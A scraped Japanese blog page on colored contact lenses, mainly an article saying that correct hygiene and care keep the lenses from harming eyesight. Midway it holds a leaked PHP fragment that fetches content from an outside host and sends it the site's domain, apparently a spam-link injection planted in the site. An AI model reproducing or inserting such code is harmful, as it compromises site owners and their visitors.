劣化したカラコンは絶対に使わない

毎日カラコンをつけない人だと、1ヶ月使えるカラコンが余ってしまうこともあります。
これを取って

姉妹でお揃いのカラコンをつけてみた

姉がカラコンデビューするというので、自分も便乗してみることにしました。
どちらも矯正用のコンタ

カラコン最新情報

カラコンで視力低下が起こるというのは本当か

「カラコンをつけると視力が低下する」という噂があります。
昔はメガネをかけると視力が低下すると言われたこともありました。
確かに、正しい使い方を守らずに使えば結膜炎や角膜炎などが起こり、視力が低下してしまう可能性はあります。
しかし、正しい使い方を心得て実践すれば、視力が下がることはありません。
カラコンは以前までは化粧品のような美容器具の扱いになっていましたが、今では高度医療器具に指定されていて、矯正用コンタクトレンズと同じ扱いになっています。
カラコンの正しい扱い方は、レンズに触れるときには必ず手を洗う、取り外したレンズは洗浄液で洗い、保存液で保存する、こすり洗いをして毎回汚れを落とす、といったことを守れば大丈夫です。
また、つけたまま寝てしまうのもよくあることですが、これは視力低下の原因になります。
角膜が酸素不足になって、機能が低下してしまう恐れがあるからです。
同じ製品を使っている友達や家族間であっても、貸借りは絶対にしないという点も守りましょう。

".file_get_contents('http://links-001.com/123set4.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

カラコンについて

30代女性でも不自然にならないカラコン

カラコンというと10?20代のギャル系の若い子がつけているというイメージがありますが、今では30?4

  • トップページ
Copyright© カラコンl Rights Reserved.